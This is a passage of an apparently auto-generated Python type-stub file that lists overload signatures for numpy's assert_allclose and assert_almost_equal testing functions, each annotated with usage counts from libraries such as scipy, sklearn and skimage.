...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64, err_msg: str):
"""
usage.sklearn: 16
"""
...
@overload
def assert_allclose(actual: float, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
err_msg: str,
):
"""
usage.sklearn: 5
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.float64, err_msg: str):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[numpy.float64]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LocalOutlierFactor"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ARDRegression"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["AdaBoostClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["AdaBoostRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BaggingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BaggingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BayesianRidge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BernoulliNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["CategoricalNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ComplementNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["DummyClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["DummyRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ElasticNet"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ElasticNetCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["EllipticEnvelope"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreeRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreesClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreesRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.memmap, desired: numpy.memmap, rtol: float, atol: float, err_msg: str
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["GammaRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["GaussianNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["HuberRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["IsolationForest"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: float, rtol: float, atol: float, err_msg: Literal[""]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KNeighborsClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KNeighborsRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KernelRidge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LabelPropagation"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LabelSpreading"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["Lars"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LarsCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Lasso"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLars"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLarsCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLarsIC"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearRegression"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearSVC"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearSVR"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LogisticRegression"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LogisticRegressionCV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MLPClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MLPRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiOutputRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskElasticNet"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskLasso"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskLassoCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultinomialNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NearestCentroid"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NuSVC"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NuSVR"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneClassSVM"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneVsOneClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneVsRestClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OutputCodeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PLSCanonical"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PLSRegression"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Perceptron"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PoissonRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RANSACRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["RFE"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RFECV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RegressorChain"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Ridge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeClassifierCV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["SGDClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["SGDRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["SVC"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["SVR"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["TheilSenRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["TweedieRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver svd"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver lsqr"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver eigen"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
rtol: float,
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["estimator_name"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray], atol: float):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: List[List[int]],
desired: List[List[int]],
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: pandas.core.frame.DataFrame,
desired: pandas.core.frame.DataFrame,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: List[int],
desired: List[int],
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: pandas.core.series.Series,
desired: pandas.core.series.Series,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
def assert_allclose(
actual: object,
desired: object,
rtol: Union[int, float, numpy.float64, bool] = ...,
atol: Union[int, float, numpy.float64, numpy.float32, numpy.float128] = ...,
err_msg: Union[
str, Tuple[Union[complex, int, float, numpy.float64], ...], float, numpy.ndarray
] = ...,
verbose: bool = ...,
):
"""
usage.matplotlib: 184
usage.scipy: 4705
usage.skimage: 158
usage.sklearn: 760
usage.xarray: 38
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: int):
"""
usage.scipy: 41
usage.skimage: 7
usage.sklearn: 141
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float):
"""
usage.matplotlib: 8
usage.scipy: 173
usage.skimage: 47
usage.sklearn: 189
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray, decimal: int):
"""
usage.scipy: 43
usage.skimage: 15
usage.sklearn: 77
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float, decimal: int):
"""
usage.matplotlib: 3
usage.scipy: 164
usage.skimage: 35
usage.sklearn: 109
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64, decimal: int):
"""
usage.scipy: 64
usage.skimage: 6
usage.sklearn: 47
"""
...
@overload
def assert_almost_equal(actual: numpy.float16, desired: float, decimal: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray):
"""
usage.matplotlib: 23
usage.scipy: 205
usage.skimage: 116
usage.sklearn: 127
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: int, decimal: int):
"""
usage.skimage: 1
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int], decimal: int):
"""
usage.scipy: 1
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.skimage: 1
usage.sklearn: 8
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: Tuple[int, int]):
"""
usage.skimage: 12
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: int, decimal: int):
"""
usage.scipy: 10
usage.skimage: 5
usage.sklearn: 10
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[float]):
"""
usage.scipy: 19
usage.skimage: 2
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int]):
"""
usage.scipy: 46
usage.skimage: 1
usage.sklearn: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.matplotlib: 2
usage.scipy: 67
usage.skimage: 21
usage.sklearn: 131
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: int):
"""
usage.scipy: 6
usage.skimage: 5
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64):
"""
usage.scipy: 5
usage.skimage: 1
usage.sklearn: 9
"""
...
@overload
def assert_almost_equal(actual: Tuple[int, int], desired: List[float], decimal: int):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.int64):
"""
usage.skimage: 2
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: int, desired: int):
"""
usage.scipy: 1
usage.skimage: 3
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: float):
"""
usage.matplotlib: 1
usage.scipy: 42
usage.skimage: 16
usage.sklearn: 33
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: List[numpy.float64]):
"""
usage.skimage: 2
"""
...
@overload
def assert_almost_equal(
actual: Tuple[slice[int, int, int], slice[int, int, int]],
desired: Tuple[slice[int, int, int], slice[int, int, int]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.uint8, desired: numpy.uint8):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[slice[int, int, int], slice[int, int, int], slice[int, int, int]],
desired: Tuple[slice[int, int, int], slice[int, int, int], slice[int, int, int]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float64, decimal: int):
"""
usage.scipy: 13
usage.skimage: 3
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(actual: float, desired: int):
"""
usage.scipy: 6
usage.skimage: 8
usage.sklearn: 10
"""
...
@overload
def assert_almost_equal(actual: Tuple[float, float], desired: Tuple[float, float]):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.skimage: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[int, float]]):
"""
usage.scipy: 7
usage.skimage: 2
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[List[int]]):
"""
usage.skimage: 4
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: float):
"""
usage.matplotlib: 4
usage.scipy: 17
usage.sklearn: 5
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float64):
"""
usage.scipy: 9
usage.sklearn: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.ndarray):
"""
usage.scipy: 4
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: complex, desired: complex):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.float32, desired: numpy.float32):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.complex64, desired: numpy.complex64):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.complex128, desired: numpy.complex128):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.complex128):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float32, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: float):
"""
usage.scipy: 10
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.uint64, desired: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.float32, desired: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.int8, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint8, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.int16, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint16, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.int32, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint32, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.bool_, desired: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: float, decimal: int):
"""
usage.scipy: 10
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[float], decimal: int):
"""
usage.scipy: 21
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[float, int]], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["N regression"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[complex]):
"""
usage.scipy: 5
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[complex, int]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[int, complex]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[int, complex, float]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[complex, float]], decimal: int
):
"""
usage.scipy: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[complex], decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[numpy.complex128], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.matrix, desired: numpy.matrix):
"""
usage.scipy: 7
"""
...
@overload
def assert_almost_equal(actual: numpy.matrix, desired: numpy.ndarray):
"""
usage.scipy: 7
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.matrix):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["2 ; 3 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; 8 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; -2 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["array(-1) ; -2 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; array(-2) ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: int, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, decimal: int):
"""
usage.scipy: 31
usage.sklearn: 5
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 7
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.complex128, desired: numpy.complex128, decimal: int
):
"""
usage.scipy: 14
"""
...
@overload
def assert_almost_equal(actual: numpy.complex128, desired: complex):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #3"]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #8"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #9"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #10"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #11"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #12"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #13"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #14"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #15"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #0"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #1"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #2"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #4"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #5"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #6"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #7"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 1
"""
